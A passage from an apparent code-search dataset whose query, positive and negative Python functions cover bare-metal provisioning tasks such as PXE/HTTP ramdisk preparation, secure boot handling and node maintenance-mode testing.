"def check_secure_boot_status(show_alert=False):\n boot_mode = get_boot_mode()\n cmd = ['PowerShell', '-Command', 'Confirm-SecureBootUEFI']\n result = run_program(cmd, check=False)\n\n # Check results\n if result.returncode == 0:\n out = result.stdout.decode()\n if 'True' in out:\n # It's on, do nothing\n return\n elif 'False' in out:\n if show_alert:\n show_alert_box('Secure Boot DISABLED')\n raise SecureBootDisabledError\n else:\n if show_alert:\n show_alert_box('Secure Boot status UNKNOWN')\n raise SecureBootUnknownError\n else:\n if boot_mode != 'UEFI':\n if (show_alert and\n global_vars['OS']['Version'] in ('8', '8.1', '10')):\n # OS supports Secure Boot\n show_alert_box('Secure Boot DISABLED\\n\\nOS installed LEGACY')\n raise OSInstalledLegacyError\n else:\n # Check error message\n err = result.stderr.decode()\n if 'Cmdlet not supported' in err:\n if show_alert:\n show_alert_box('Secure Boot UNAVAILABLE?')\n raise SecureBootNotAvailError\n else:\n if show_alert:\n show_alert_box('Secure Boot ERROR')\n raise GenericError",
"def try_disable_insecure_reclaim():\n if is_leader():\n try:\n subprocess.check_call([\n 'ceph', '--id', 'admin',\n 'config', 'set', 'mon',\n 'auth_allow_insecure_global_id_reclaim', 'false'])\n except subprocess.CalledProcessError as e:\n log(\"Could not disable insecure reclaim: {}\".format(e),\n level='ERROR')",
"def is_enabled(self) -> bool:\n if not self._system.dax_sim_enabled:\n # Check if the system was just booted\n last_asf = self.core_cache.get(self._CACHE_LAST_ASF_KEY)\n if len(last_asf) == 0:\n # Device was just booted, trap RF is off\n return False\n\n # Return the enabled flag stored as a system dataset\n # Can raise a KeyError if the key was not set before, which means the state is ambiguous\n enabled: bool = self.get_dataset_sys(self._ENABLED_KEY) # Helps the type checker\n return enabled",
"def is_enabled_for(self, security_state: Target.SecurityState) -> bool:\n assert isinstance(security_state, Target.SecurityState)\n\n # Call to superclass to read CSW. We want to bypass our CSW cache since the enable signal can change\n # asynchronously.\n csw = AccessPort.read_reg(self, self._reg_offset + MEM_AP_CSW)\n if security_state is Target.SecurityState.NONSECURE:\n # Nonsecure transfers are always allowed when security transfers are enabled.\n return (csw & (CSW_DEVICEEN | CSW_SDEVICEEN)) != 0\n elif security_state is Target.SecurityState.SECURE:\n return (csw & CSW_SDEVICEEN) != 0\n else:\n assert False, \"unsupported security state\"",
"def test_disable():\n console = Console()\n\n assert console.enabled\n\n console.enabled = False\n\n assert not console.enabled",
"def disable_ssl(self) -> bool:\n return pulumi.get(self, \"disable_ssl\")",
"def disabled(kls):\n from wouso.core.config.models import BoolSetting\n\n return BoolSetting.get('setting-%s' % kls.name()).get_value() is False",
"def is_disabled(self):\n return self.node.is_disabled()",
"def _helper_disabled(self):\n disabled = ADDON.getSetting('disabled')\n if not disabled:\n ADDON.setSetting('disabled', 'false') # create default entry\n disabled = 'false'\n\n if disabled == 'true':\n self._log('inputstreamhelper is disabled in settings.xml.')\n return True\n else:\n self._log('inputstreamhelper is enabled. You can disable inputstreamhelper by setting \\\"disabled\\\" to \\\"true\\\" in settings.xml (Note: only recommended for developers knowing what they\\'re doing!)')\n return False",
"def kdump_disable(db):\n kdump_table = db.cfgdb.get_table(\"KDUMP\")\n check_kdump_table_existence(kdump_table)\n\n db.cfgdb.mod_entry(\"KDUMP\", \"config\", {\"enabled\": \"false\"})\n click.echo(\"KDUMP configuration changes may require a reboot to take effect.\")\n click.echo(\"Save SONiC configuration using 'config save' before issuing the reboot command.\")",
"def disable(self):\n result = self.__enabled\n self.__enabled = False\n return result",
"def disable_secure_nat(self, hubname: str):\n return self._request_handler(json={\n \"jsonrpc\": \"2.0\",\n \"id\": \"rpc_call_id\",\n \"method\": \"DisableSecureNAT\",\n \"params\": {\n \"HubName_str\": hubname\n }\n })",
"def is_iscsi_boot_supported(self):\n return utils.is_operation_allowed(\n 'PATCH', self,\n ['@Redfish.Settings', 'SettingsObject'])",
"def negative_auto_cic_maintenance_mode(self):\n self.env.revert_snapshot('cic_maintenance_mode')\n\n cluster_id = self.fuel_web.get_last_created_cluster()\n\n # Select a non-primary controller\n regular_ctrl = self.fuel_web.get_nailgun_node_by_name(\"slave-02\")\n dregular_ctrl = self.fuel_web.get_devops_node_by_nailgun_node(\n regular_ctrl)\n _ip = regular_ctrl['ip']\n _id = regular_ctrl['id']\n\n asserts.assert_true('True' in check_available_mode(_ip),\n \"Maintenance mode is not available\")\n logger.info('Disable UMM on node-{0}'.format(_id))\n\n change_config(_ip, umm=False, reboot_count=0)\n\n asserts.assert_false('True' in check_available_mode(_ip),\n \"Maintenance mode should not be available\")\n\n command = 'reboot --force >/dev/null & '\n\n logger.info('Unexpected reboot on node-{0}'\n .format(_id))\n\n self.ssh_manager.execute_on_remote(\n ip=_ip,\n cmd=command)\n\n wait(lambda:\n not checkers.check_ping(self.env.get_admin_node_ip(),\n _ip),\n timeout=60 * 10)\n\n # Node don't have enough time for set offline status\n # after reboot --force\n # Just waiting\n\n asserts.assert_true(\n checkers.check_ping(self.env.get_admin_node_ip(),\n _ip,\n deadline=600),\n \"Host {0} is not reachable by ping during 600 sec\"\n \"\".format(_ip))\n logger.info('Wait a node-{0} online status after unexpected '\n 'reboot'.format(_id))\n\n self.fuel_web.wait_nodes_get_online_state([dregular_ctrl])\n\n logger.info('Check that node-{0} not in maintenance mode after'\n ' unexpected reboot'.format(_id))\n\n wait(lambda: tcp_ping(_ip, 22),\n timeout=60 * 10,\n timeout_msg='Node {} still is not available by SSH'.format(\n dregular_ctrl.name))\n\n asserts.assert_false('True' in check_auto_mode(_ip),\n \"Maintenance mode should not switched\")\n\n # Wait until MySQL Galera is UP on some controller\n self.fuel_web.wait_mysql_galera_is_up(\n [dregular_ctrl.name])\n\n # Wait until Cinder services UP on a controller\n self.fuel_web.wait_cinder_is_up(\n [dregular_ctrl.name])\n\n # Wait until RabbitMQ cluster is UP\n wait_pass(lambda:\n self.fuel_web.run_single_ostf_test(\n cluster_id, test_sets=['ha'],\n test_name=ostf_test_mapping.OSTF_TEST_MAPPING.get(\n 'RabbitMQ availability')),\n timeout=1500)\n logger.info('RabbitMQ cluster is available')\n\n wait_pass(lambda:\n self.fuel_web.run_single_ostf_test(\n cluster_id, test_sets=['sanity'],\n test_name=ostf_test_mapping.OSTF_TEST_MAPPING.get(\n 'Check that required services are running')),\n timeout=1500)\n logger.info(\"Required services are running\")\n\n try:\n self.fuel_web.run_ostf(cluster_id,\n test_sets=['smoke', 'sanity', 'ha'])\n except AssertionError:\n logger.debug(\"Test failed from first probe,\"\n \" we sleep 600 second try one more time\"\n \" and if it fails again - test will fails \")\n time.sleep(600)\n self.fuel_web.run_ostf(cluster_id,\n test_sets=['smoke', 'sanity', 'ha'])",
"def disable(nitro, service):\n __service = NSService()\n __service.set_name(service.get_name())\n __service.set_delay(service.get_delay())\n __service.set_graceful(service.get_graceful())\n return __service.perform_operation(nitro, \"disable\")"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Checks if directed lanboot is requested
|
def is_directed_lanboot_requested(node):
directed_lanboot_requested = (
str(node.driver_info.get('enable_directed_lanboot', 'false')).lower())
return directed_lanboot_requested == 'true'
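
Illustrative only (not part of the dataset record): because the flag is normalised with str(...).lower(), both the string 'True' and the boolean True enable directed LAN boot, and a missing key defaults to disabled. A minimal sketch, with types.SimpleNamespace standing in for an Ironic node object:

from types import SimpleNamespace

assert is_directed_lanboot_requested(
    SimpleNamespace(driver_info={'enable_directed_lanboot': 'True'})) is True
assert is_directed_lanboot_requested(
    SimpleNamespace(driver_info={'enable_directed_lanboot': True})) is True
assert is_directed_lanboot_requested(
    SimpleNamespace(driver_info={})) is False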
|
[
"def has_lldp_cli(self):\n cmd = self.cli(\"show config dynamic\", ignore_errors=True)\n return \"enable lldp\" in cmd",
"def is_lcd_reachable():\n\n response = requests.get(NODE_INFO_ENDPOINT)\n return True if response.status_code == 200 else False",
"def iswitch_initialized():\n return (path.isdir(get_iswitch_dir_path()) and\n path.islink(get_irods_config_path()) and\n os.readlink(get_irods_config_path()).startswith(get_iswitch_dir_path()+\"/\"))",
"def checkNetworkStatus(self):\r\n pass",
"def has_lldp_cli(self):\n try:\n cmd = self.cli(\"show lldp configuration\", cached=True)\n return \"LLDP state: Enabled\" in cmd\n except self.CLISyntaxError:\n # On SKS-16E1-IP-I-4P Series Software, Version 2.2.0C Build 40897\n # we are not have way, to see, if lldp enabled global\n return True",
"def has_lldp(self):\n cmd = self.cli(\"show lldp | include State\")\n return self.rx_lldp.search(cmd) is not None",
"def check_available(self):\n self._available = None\n self.last_check_time = datetime.datetime.now()\n if self.device_up:\n self.check_local_ip()\n if self.gateway and not self.check_gateway():\n self.status = 'Gateway {} not reachable'.format(self.gateway)\n logger.critical('Gateway {} not reachable'.format(self.gateway))\n ping_ip = self.target_ip\n if ping_ip:\n self.check_test_route()\n (returncode,output) = run('/bin/ping -q -n -c{ping_count:n} -W{timeout:n} -i{ping_interval} -I{device} {target_ip}'.format(\n ping_count = self.ping_count,\n timeout = self.timeout,\n device = self.device,\n target_ip = ping_ip,\n ping_interval=self.ping_interval,\n ))\n if returncode == 0:\n report = REPORT.search(output)\n rtt = RTT.search(output)\n if report:\n self.last_loss = int(report.groupdict()['loss'])\n else:\n self.last_loss = None\n if rtt:\n self.last_rtt = float(rtt.groupdict()['avg'])\n else:\n self.last_rtt = None\n\n self._available = report and rtt and\\\n self.last_loss<=self.max_loss and\\\n self.last_rtt<=self.max_rtt\n if self._available:\n self.status='OK'\n elif self.last_loss>self.max_loss:\n self.status='Too much loss {}%'.format(self.last_loss)\n elif self.last_rtt>self.max_rtt:\n self.status='Too long RTT {}ms'.format(self.last_rtt)\n else:\n self.status = 'ping test failed : {}'.format(output)\n else:\n self._available = True\n else:\n self.status = 'Device {} is down or link state is unknown'.format(self.device)\n self._available = False\n\n self.update_leds()\n return self._available",
"def __check_neighbour(self, address):\n print(\"neighbour checked!\")\n if self.stream.get_node_by_server(address[0], address[1]):\n if not (self.stream.get_node_by_server(address[0], address[1]).is_register()):\n return True\n\n pass",
"def check_test_route(self):\n if self.target_ip:\n (retcode,route) = run('/sbin/ip route show {target_ip}'.format(target_ip=self.target_ip))\n if self.gateway:\n if not \"{target_ip} via {gateway}\".format(target_ip=self.target_ip,gateway=self.gateway) in route:\n logger.debug(run('/sbin/ip route del {target_ip}'.format(target_ip=self.target_ip),dry_run=self.dry_run)[1])\n logger.warning('No route for {target_ip} via {gateway}, adding one'.format(target_ip=self.target_ip,gateway=self.gateway))\n logger.debug(run('/sbin/ip route add {target_ip} via {gateway}'.format(target_ip=self.target_ip,gateway=self.gateway),dry_run=self.dry_run)[1])\n elif self.device:\n if not \" {} \".format(self.device) in route:\n logger.warning('No route for {target_ip} through {device}, adding one'.format(target_ip=self.target_ip,device=self.device))\n logger.debug(run('/sbin/ip route add {target_ip} dev {device}'.format(target_ip=self.target_ip,device=self.device),dry_run=self.dry_run)[1])\n else:\n logger.critical('No gateway for {target_ip}'.format(target_ip=self.target_ip))",
"def update_broadlink_on_toggle(mac_adress, input_bool):\n\n #Before running this service check the state of the input_boolean. If the state is off then do not run the service\n state = state.get(input_bool) \n if state == \"off\":\n log.debug(\"The device is off - The service will not try to update\") \n return \n\n ##Get recorded information in the json file\n json_data = read_json_data(os.path.join(BROADLINK_CONFIG_FOLDER, mac_adress.replace(':', '') + \".json\"))\n ip_address = json_data[\"ip\"]\n try: \n device = blk.hello(ip_address, timeout = 1)# Is this timeout enough? Since its in the local network it should be fine\n except blk.exceptions.NetworkTimeoutError: \n message = f\"Could not reach the IP address {ip_address}. Running discovery ...\" \n notify.persistent_notification(message = message, title = \"Broadlink\")\n broadlink_raceland.update_broadlink_remotes() #Update broadlink devices if there was a network error \n \n else: \n discovered_device_mac = format_mac(device.mac) #Note: pyscript does not support iterators\n if discovered_device_mac != mac_adress: #On the off chance the IP adress update makes one device have the IP address of another device (broadlink)\n message = f\"Ip address was updated {ip_address}. Running discovery ...\"\n notify.persistent_notification(message = message, title = \"Broadlink\")\n broadlink_raceland.update_broadlink_remotes() #Update broadlink devices if there was a network error ",
"def is_existing_flat_vlan_allowed():\n return bool(CONF.nuage_sut.nuage_sriov_allow_existing_flat_vlan)",
"def requested_load_balancer_management(self):\n return bool(self._unit.received[\"enable-load-balancer-management\"])",
"def loopback(self): # bool\n return self._loopback",
"def readyForNewRoute():\r\n if cLoca == cDest & cStat == ready & nDest == 0:\r\n return 1\r\n else:\r\n return 0",
"def is_loopback(address: IPv4Address | IPv6Address) -> bool:\n return any(address in network for network in LOOPBACK_NETWORKS)",
"def has_ap_layer(pkt):\n if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp) or pkt.haslayer(Dot11AssoResp):\n # if this packet has layer beacon, or probe response or association response\n if hasattr(pkt, 'addr2'):\n # it is an Access Point packet\n return True\n return False",
"def needs_init(self):\n return (self._node_device_status and (self._node_device_status.tag == 'down'\n or self._node_device_status.tag == 'unready'))",
"def display_is_loopback_error(self):\r\n self._display_error(\"This address seems to be a loopback address. Please try again.\")",
"def check_devices(self) -> bool:\n\t\tpass"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Disables secure boot on the node; does not throw if it is not supported.
|
def disable_secure_boot_if_supported(task):
try:
sdflex_common.update_secure_boot_mode(task, False)
    # We need to handle the SDFlexOperationNotSupported exception for the
    # case where the user has incorrectly set the Node capability
    # 'secure_boot' on a node that does not have that capability and
    # attempted a deploy. Handling this exception here helps the
    # user to tear down such a Node.
except exception.SDFlexOperationNotSupported:
LOG.warning('Secure boot mode is not supported for node %s',
task.node.uuid)
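
Illustrative only (not part of the dataset record): a sketch of the "not supported" path. It uses a local stand-in exception class so the example does not depend on the real exception's constructor signature, and it assumes the module-level names exception, sdflex_common and LOG are patchable as in the driver module.

from unittest import mock

class _StubNotSupported(Exception):
    """Stand-in for exception.SDFlexOperationNotSupported."""

def test_disable_secure_boot_if_supported_swallows_not_supported():
    task = mock.Mock()
    task.node.uuid = 'fake-node-uuid'
    with mock.patch.object(exception, 'SDFlexOperationNotSupported',
                           _StubNotSupported), \
            mock.patch.object(sdflex_common, 'update_secure_boot_mode',
                              side_effect=_StubNotSupported()) as update_mode:
        # Must not raise; the driver only logs a warning.
        disable_secure_boot_if_supported(task)
        update_mode.assert_called_once_with(task, False)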
|
[
"def _disable_secure_boot(task):\n cur_sec_state = False\n try:\n cur_sec_state = sdflex_common.get_secure_boot_mode(task)\n except exception.SDFlexOperationNotSupported:\n LOG.debug('Secure boot mode is not supported for node %s',\n task.node.uuid)\n else:\n if cur_sec_state:\n LOG.debug('Disabling secure boot for node %s', task.node.uuid)\n sdflex_common.set_secure_boot_mode(task, False)",
"def try_disable_insecure_reclaim():\n if is_leader():\n try:\n subprocess.check_call([\n 'ceph', '--id', 'admin',\n 'config', 'set', 'mon',\n 'auth_allow_insecure_global_id_reclaim', 'false'])\n except subprocess.CalledProcessError as e:\n log(\"Could not disable insecure reclaim: {}\".format(e),\n level='ERROR')",
"def task_disable_selinux():\n return sequence([\n run(\"if selinuxenabled; then setenforce 0; fi\"),\n run(\"test -e /etc/selinux/config && \"\n \"sed --in-place='.preflocker' \"\n \"'s/^SELINUX=.*$/SELINUX=disabled/g' \"\n \"/etc/selinux/config\"),\n ])",
"def disable_self_heal_daemon(mnode, volname):\n cmd = \"gluster volume set %s self-heal-daemon off\" % volname\n ret, _, _ = g.run(mnode, cmd)\n if ret != 0:\n return False\n\n return True",
"def disable_secure_nat(self, hubname: str):\n return self._request_handler(json={\n \"jsonrpc\": \"2.0\",\n \"id\": \"rpc_call_id\",\n \"method\": \"DisableSecureNAT\",\n \"params\": {\n \"HubName_str\": hubname\n }\n })",
"def disable_module(address, name, module):\n explore = explorepy.explore.Explore()\n explore.connect(mac_address=address, device_name=name)\n explore.disable_module(module)",
"def poweroff():\r\n call(['systemctl', 'poweroff', '-i'])",
"def negative_auto_cic_maintenance_mode(self):\n self.env.revert_snapshot('cic_maintenance_mode')\n\n cluster_id = self.fuel_web.get_last_created_cluster()\n\n # Select a non-primary controller\n regular_ctrl = self.fuel_web.get_nailgun_node_by_name(\"slave-02\")\n dregular_ctrl = self.fuel_web.get_devops_node_by_nailgun_node(\n regular_ctrl)\n _ip = regular_ctrl['ip']\n _id = regular_ctrl['id']\n\n asserts.assert_true('True' in check_available_mode(_ip),\n \"Maintenance mode is not available\")\n logger.info('Disable UMM on node-{0}'.format(_id))\n\n change_config(_ip, umm=False, reboot_count=0)\n\n asserts.assert_false('True' in check_available_mode(_ip),\n \"Maintenance mode should not be available\")\n\n command = 'reboot --force >/dev/null & '\n\n logger.info('Unexpected reboot on node-{0}'\n .format(_id))\n\n self.ssh_manager.execute_on_remote(\n ip=_ip,\n cmd=command)\n\n wait(lambda:\n not checkers.check_ping(self.env.get_admin_node_ip(),\n _ip),\n timeout=60 * 10)\n\n # Node don't have enough time for set offline status\n # after reboot --force\n # Just waiting\n\n asserts.assert_true(\n checkers.check_ping(self.env.get_admin_node_ip(),\n _ip,\n deadline=600),\n \"Host {0} is not reachable by ping during 600 sec\"\n \"\".format(_ip))\n logger.info('Wait a node-{0} online status after unexpected '\n 'reboot'.format(_id))\n\n self.fuel_web.wait_nodes_get_online_state([dregular_ctrl])\n\n logger.info('Check that node-{0} not in maintenance mode after'\n ' unexpected reboot'.format(_id))\n\n wait(lambda: tcp_ping(_ip, 22),\n timeout=60 * 10,\n timeout_msg='Node {} still is not available by SSH'.format(\n dregular_ctrl.name))\n\n asserts.assert_false('True' in check_auto_mode(_ip),\n \"Maintenance mode should not switched\")\n\n # Wait until MySQL Galera is UP on some controller\n self.fuel_web.wait_mysql_galera_is_up(\n [dregular_ctrl.name])\n\n # Wait until Cinder services UP on a controller\n self.fuel_web.wait_cinder_is_up(\n [dregular_ctrl.name])\n\n # Wait until RabbitMQ cluster is UP\n wait_pass(lambda:\n self.fuel_web.run_single_ostf_test(\n cluster_id, test_sets=['ha'],\n test_name=ostf_test_mapping.OSTF_TEST_MAPPING.get(\n 'RabbitMQ availability')),\n timeout=1500)\n logger.info('RabbitMQ cluster is available')\n\n wait_pass(lambda:\n self.fuel_web.run_single_ostf_test(\n cluster_id, test_sets=['sanity'],\n test_name=ostf_test_mapping.OSTF_TEST_MAPPING.get(\n 'Check that required services are running')),\n timeout=1500)\n logger.info(\"Required services are running\")\n\n try:\n self.fuel_web.run_ostf(cluster_id,\n test_sets=['smoke', 'sanity', 'ha'])\n except AssertionError:\n logger.debug(\"Test failed from first probe,\"\n \" we sleep 600 second try one more time\"\n \" and if it fails again - test will fails \")\n time.sleep(600)\n self.fuel_web.run_ostf(cluster_id,\n test_sets=['smoke', 'sanity', 'ha'])",
"def gpu_disable():\n return msg(\"GPU: disable\")",
"def prepare_instance(self, task):\n # Need to enable secure boot, if being requested.\n # update_secure_boot_mode checks and enables secure boot only if the\n # deploy has requested secure boot\n boot_option = deploy_utils.get_boot_option(task.node)\n if boot_option != \"kickstart\":\n sdflex_common.update_secure_boot_mode(task, True)\n if not http_utils.is_http_boot_requested(task.node):\n if boot_option == \"kickstart\":\n prepare_node_for_deploy(task)\n super(SdflexPXEBoot, self).prepare_instance(task)\n else:\n boot_mode_utils.sync_boot_mode(task)\n node = task.node\n boot_option = deploy_utils.get_boot_option(node)\n boot_device = None\n instance_image_info = {}\n if boot_option == \"ramdisk\":\n instance_image_info = http_utils.get_instance_image_info(task)\n http_utils.cache_ramdisk_kernel(task, instance_image_info)\n if deploy_utils.is_iscsi_boot(task) or boot_option == \"ramdisk\":\n http_utils.prepare_instance_http_config(\n task, instance_image_info,\n iscsi_boot=deploy_utils.is_iscsi_boot(task),\n ramdisk_boot=(boot_option == \"ramdisk\"))\n if http_utils.is_http_boot_requested(task.node):\n boot_device = boot_devices.UEFIHTTP\n else:\n boot_device = boot_devices.PXE\n elif boot_option != \"local\":\n if task.driver.storage.should_write_image(task):\n # Make sure that the instance kernel/ramdisk is cached.\n # This is for the takeover scenario for active nodes.\n instance_image_info = (\n http_utils.get_instance_image_info(task))\n http_utils.cache_ramdisk_kernel(task, instance_image_info)\n iwdi = (\n task.node.driver_internal_info.get('is_whole_disk_image'))\n try:\n root_uuid_or_disk_id = task.node.driver_internal_info[\n 'root_uuid_or_disk_id'\n ]\n except KeyError:\n if not task.driver.storage.should_write_image(task):\n pass\n elif not iwdi:\n LOG.warning(\"The UUID for the root partition can't be\"\n \" found, unable to switch the pxe config \"\n \"from deployment mode to service (boot) \"\n \"mode for node %(node)s\",\n {\"node\": task.node.uuid})\n else:\n LOG.warning(\"The disk id for the whole disk image \"\n \"can't be found, unable to switch the \"\n \"pxe config from deployment mode to \"\n \"service (boot) mode for node %(node)s. \"\n \"Booting the instance from disk.\",\n {\"node\": task.node.uuid})\n http_utils.clean_up_http_config(task)\n boot_device = boot_devices.DISK\n else:\n http_utils.build_service_http_config(task,\n instance_image_info,\n root_uuid_or_disk_id)\n if http_utils.is_http_boot_requested(task.node):\n boot_device = boot_devices.UEFIHTTP\n else:\n boot_device = boot_devices.PXE\n else:\n # If it's going to boot from the local disk, we don't need\n # PXE config files. They still need to be generated as part\n # of the prepare() because the deployment does PXE boot the\n # deploy ramdisk\n http_utils.clean_up_http_config(task)\n boot_device = boot_devices.DISK\n\n # NOTE(pas-ha) do not re-set boot device on ACTIVE nodes\n # during takeover\n if boot_device and task.node.provision_state != states.ACTIVE:\n persistent = True\n if node.driver_info.get('force_persistent_boot_device',\n 'Default') == 'Never':\n persistent = False\n manager_utils.node_set_boot_device(task, boot_device,\n persistent=persistent)",
"def check_secure_boot_status(show_alert=False):\n boot_mode = get_boot_mode()\n cmd = ['PowerShell', '-Command', 'Confirm-SecureBootUEFI']\n result = run_program(cmd, check=False)\n\n # Check results\n if result.returncode == 0:\n out = result.stdout.decode()\n if 'True' in out:\n # It's on, do nothing\n return\n elif 'False' in out:\n if show_alert:\n show_alert_box('Secure Boot DISABLED')\n raise SecureBootDisabledError\n else:\n if show_alert:\n show_alert_box('Secure Boot status UNKNOWN')\n raise SecureBootUnknownError\n else:\n if boot_mode != 'UEFI':\n if (show_alert and\n global_vars['OS']['Version'] in ('8', '8.1', '10')):\n # OS supports Secure Boot\n show_alert_box('Secure Boot DISABLED\\n\\nOS installed LEGACY')\n raise OSInstalledLegacyError\n else:\n # Check error message\n err = result.stderr.decode()\n if 'Cmdlet not supported' in err:\n if show_alert:\n show_alert_box('Secure Boot UNAVAILABLE?')\n raise SecureBootNotAvailError\n else:\n if show_alert:\n show_alert_box('Secure Boot ERROR')\n raise GenericError",
"def __init__(self, device_name, msg):\n super(PasswordNotDisabledError, self).__init__(\n device_name, msg, reason=\"root user still has a password\")",
"def test_boot_no_safe(self, no_safe_robot):\n with mock.patch.object(no_safe_robot, \"go_safe_pos\", autospec=True) as mock_func:\n with mock.patch(\"src.printer_components.MelfaRobot.sleep\", return_value=None):\n no_safe_robot.boot()\n assert not mock_func.called",
"def run_disable_rhnplugin():\n run(\"sed -i 's/enabled = 1/enabled = 0/g' /etc/yum/pluginconf.d/rhnplugin.conf\")",
"def disable(self, host, binary):\n body = {\"host\": host, \"binary\": binary}\n result = self._update(\"/os-services/disable\", body)\n return self.resource_class(self, result, resp=result.request_ids)",
"def disable_autologin():\n print(\"Removing default user\")\n try:\n remove_default_user()\n except:\n pass\n print(\"Disabling automatic login\")\n if not check_slim_conf():\n return False\n if not run_with_sudo([\"sed\", \"-i\", \"''\", \"-e\", \"s/^auto_login.*/#auto_login no/g\", slim_config_file]):\n return False\n QMessageBox.information(None, \"Automatic login\", \"Automatic login has been disabled.\")\n return True",
"def disable(cls, client, resource) :\n try :\n if type(resource) is not list :\n disableresource = nsfeature()\n disableresource.feature = resource.feature\n return disableresource.perform_operation(client,\"disable\")\n except Exception as e :\n raise e",
"def disable(nitro, service):\n __service = NSService()\n __service.set_name(service.get_name())\n __service.set_delay(service.get_delay())\n __service.set_graceful(service.get_graceful())\n return __service.perform_operation(nitro, \"disable\")",
"def kdump_disable(db):\n kdump_table = db.cfgdb.get_table(\"KDUMP\")\n check_kdump_table_existence(kdump_table)\n\n db.cfgdb.mod_entry(\"KDUMP\", \"config\", {\"enabled\": \"false\"})\n click.echo(\"KDUMP configuration changes may require a reboot to take effect.\")\n click.echo(\"Save SONiC configuration using 'config save' before issuing the reboot command.\")"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Prepares the boot of the Ironic ramdisk using PXE. This method prepares the boot of the deploy or rescue ramdisk after reading the relevant information from the node's driver_info and instance_info.
|
def prepare_ramdisk(self, task, ramdisk_params):
if task.node.provision_state in (states.DEPLOYING, states.RESCUING,
states.CLEANING, states.INSPECTING):
prepare_node_for_deploy(task)
if not http_utils.is_http_boot_requested(task.node):
super(SdflexPXEBoot, self).prepare_ramdisk(task, ramdisk_params)
else:
node = task.node
# Label indicating a deploy or rescue operation being carried out
# on the node, 'deploy' or 'rescue'. Unless the node is in a
# rescue like state, the mode is set to 'deploy', indicating
# deploy operation is being carried out.
mode = deploy_utils.rescue_or_deploy_mode(node)
http_info = http_utils.get_image_info(node, mode=mode)
        # NOTE: Try to validate and fetch instance images only
# if we are in DEPLOYING state.
if node.provision_state == states.DEPLOYING:
http_info.update(http_utils.get_instance_image_info(task))
boot_mode_utils.sync_boot_mode(task)
http_options = http_utils.build_http_config_options(task,
http_info)
http_options.update(ramdisk_params)
http_config_template = deploy_utils.get_pxe_config_template(node)
http_utils.create_http_config(task, http_options,
http_config_template)
manager_utils.node_set_boot_device(task, boot_devices.UEFIHTTP,
persistent=False)
if http_info:
http_utils.cache_ramdisk_kernel(task, http_info)
bfpv = str(task.node.driver_info.get('bfpv', 'false')).lower()
if bfpv == 'true':
node = task.node
driver_internal_info = node.driver_internal_info
driver_internal_info['bfpv_started'] = 'false'
node.driver_internal_info = driver_internal_info
node.save()
|
[
"def prepare_ramdisk(self, task, ramdisk_params):\n node = task.node\n\n # Label indicating a deploy or rescue operation being carried out on\n # the node, 'deploy' or 'rescue'. Unless the node is in a rescue like\n # state, the mode is set to 'deploy', indicating deploy operation is\n # being carried out.\n mode = deploy_utils.rescue_or_deploy_mode(node)\n\n if self.ipxe_enabled:\n # NOTE(mjturek): At this point, the ipxe boot script should\n # already exist as it is created at startup time. However, we\n # call the boot script create method here to assert its\n # existence and handle the unlikely case that it wasn't created\n # or was deleted.\n pxe_utils.create_ipxe_boot_script()\n\n # Generate options for both IPv4 and IPv6, and they can be\n # filtered down later based upon the port options.\n # TODO(TheJulia): This should be re-tooled during the Victoria\n # development cycle so that we call a single method and return\n # combined options. The method we currently call is relied upon\n # by two eternal projects, to changing the behavior is not ideal.\n dhcp_opts = pxe_utils.dhcp_options_for_instance(\n task, ipxe_enabled=self.ipxe_enabled, ip_version=4)\n dhcp_opts += pxe_utils.dhcp_options_for_instance(\n task, ipxe_enabled=self.ipxe_enabled, ip_version=6)\n provider = dhcp_factory.DHCPFactory()\n provider.update_dhcp(task, dhcp_opts)\n\n pxe_info = pxe_utils.get_image_info(node, mode=mode,\n ipxe_enabled=self.ipxe_enabled)\n\n # NODE: Try to validate and fetch instance images only\n # if we are in DEPLOYING state.\n if node.provision_state == states.DEPLOYING:\n pxe_info.update(\n pxe_utils.get_instance_image_info(\n task, ipxe_enabled=self.ipxe_enabled))\n\n boot_mode_utils.sync_boot_mode(task)\n\n pxe_options = pxe_utils.build_pxe_config_options(\n task, pxe_info, ipxe_enabled=self.ipxe_enabled,\n ramdisk_params=ramdisk_params)\n # TODO(dtantsur): backwards compability hack, remove in the V release\n if ramdisk_params.get(\"ipa-api-url\"):\n pxe_options[\"ipa-api-url\"] = ramdisk_params[\"ipa-api-url\"]\n\n if self.ipxe_enabled:\n pxe_config_template = deploy_utils.get_ipxe_config_template(node)\n else:\n pxe_config_template = deploy_utils.get_pxe_config_template(node)\n\n pxe_utils.create_pxe_config(task, pxe_options,\n pxe_config_template,\n ipxe_enabled=self.ipxe_enabled)\n manager_utils.node_set_boot_device(task, boot_devices.PXE,\n persistent=False)\n\n if self.ipxe_enabled and CONF.pxe.ipxe_use_swift:\n kernel_label = '%s_kernel' % mode\n ramdisk_label = '%s_ramdisk' % mode\n pxe_info.pop(kernel_label, None)\n pxe_info.pop(ramdisk_label, None)\n\n if pxe_info:\n pxe_utils.cache_ramdisk_kernel(task, pxe_info,\n ipxe_enabled=self.ipxe_enabled)\n\n LOG.debug('Ramdisk (i)PXE boot for node %(node)s has been prepared '\n 'with kernel params %(params)s',\n {'node': node.uuid, 'params': pxe_options})",
"def prepare_instance(self, task):\n boot_mode_utils.sync_boot_mode(task)\n node = task.node\n boot_device = None\n boot_option = deploy_utils.get_boot_option(node)\n if boot_option != \"kickstart\":\n boot_mode_utils.configure_secure_boot_if_needed(task)\n\n instance_image_info = {}\n if boot_option == \"ramdisk\" or boot_option == \"kickstart\":\n instance_image_info = pxe_utils.get_instance_image_info(\n task, ipxe_enabled=self.ipxe_enabled)\n pxe_utils.cache_ramdisk_kernel(task, instance_image_info,\n ipxe_enabled=self.ipxe_enabled)\n if 'ks_template' in instance_image_info:\n ks_cfg = pxe_utils.validate_kickstart_template(\n instance_image_info['ks_template'][1]\n )\n pxe_utils.validate_kickstart_file(ks_cfg)\n\n if (deploy_utils.is_iscsi_boot(task) or boot_option == \"ramdisk\"\n or boot_option == \"kickstart\"):\n pxe_utils.prepare_instance_pxe_config(\n task, instance_image_info,\n iscsi_boot=deploy_utils.is_iscsi_boot(task),\n ramdisk_boot=(boot_option == \"ramdisk\"),\n anaconda_boot=(boot_option == \"kickstart\"),\n ipxe_enabled=self.ipxe_enabled)\n 